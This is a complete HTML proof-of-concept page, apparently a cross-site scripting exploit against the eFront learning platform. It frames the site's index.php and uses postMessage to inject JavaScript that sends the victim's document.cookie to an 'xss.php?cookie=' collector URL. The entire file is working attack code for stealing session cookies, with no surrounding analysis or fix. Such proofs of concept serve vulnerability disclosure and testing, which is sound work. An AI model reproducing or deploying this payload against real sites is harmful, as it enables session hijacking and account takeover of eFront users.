<html>
<head>
</head>
<body onload="test()">
<iframe src="https://myefront.com/efront/www/index.php" id="iframe" frameborder="0" style="width:100%; height:100%;"></iframe>
<script>
function test()
{
    window.addEventListener('message', receiveMessage);


    var win = document.getElementById("iframe").contentWindow;
    win.postMessage("window.location.href='https://myefront.com/xss.php?cookie='+document.cookie","*");
}

function receiveMessage(e) {
    alert(e.data);
}

</script>
</body>
</html>